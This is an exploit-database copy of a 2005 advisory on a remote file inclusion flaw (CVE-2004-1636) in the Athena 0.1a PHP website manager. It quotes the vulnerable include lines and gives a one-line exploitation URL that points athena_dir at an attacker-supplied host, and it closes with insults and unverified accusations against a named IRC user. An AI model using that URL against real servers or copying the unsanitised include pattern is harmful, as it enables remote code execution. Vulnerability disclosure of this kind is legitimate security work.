Advertisement






Remote file include in Athena

CVE Category Price Severity
CVE-2004-1636 CWE-98 Not disclosed High
Author Risk Exploitation Type Date
Jean-Baptiste Aviat High Remote 2005-12-12
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2005110065

Below is a copy:

Language: PHP
Script: Athena
Version: 0.1a
Official website: http://sourceforge.net/projects/athena
Problem: Remote file inclusion
Discovered by: beford & ][GB][
 
Description:
===========
 
A simple website management system written in oo php that uses a mysql database 
to store user and group rights and the site content.
 
Problem:
========
A remote user can include and execute arbitrary PHP code from the remote location.
The problem is in the file "athena.php" for line 1 to 10:

include("$athena_dir/headers.php"); 
include("$athena_dir/classes/debug.php");
include("$athena_dir/classes/mysql.php");
include("$athena_dir/classes/config.php");
include("$athena_dir/classes/page.php");
include("$athena_dir/classes/session.php");
include("$athena_dir/classes/user.php");
include("$athena_dir/classes/error.php");
include("$athena_dir/classes/modules.php");
include("$athena_dir/classes/admin.php");

Explotation example:
===================

http://[target]/path_to_athena/athena.php?athena_dir=http://[attacker_ur
l]

Solution:
========
 
Not solution at this time.
 
 
Greetz:
=======
 
uyx, beford, Zetha, lithyum,_|MALANDDO|_ ,desKrriado, |LINUX|, Amon-Ra, Extremo, SecretDreams, caffa
 
&& irc.gigachat.net #uruguay, #h4ck3rsbr, #IYS, #D.O.M, #MSR ,,, irc.fullnetwork.org #full, #f4kelive
   
irc.org.ve #uruguay, #venezuela
 
Fuckz:
=====
Morgan lamer and his irc.irc-argentina.org, his small ddos-botnet, its hidden in that server, the bot
s are
supposed to be argentinian users but noooo, he is using that ripped worm code i mentioned before!!!
he is such a leet h4x0r from santiago del estero (.ar)! hahahhaa

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum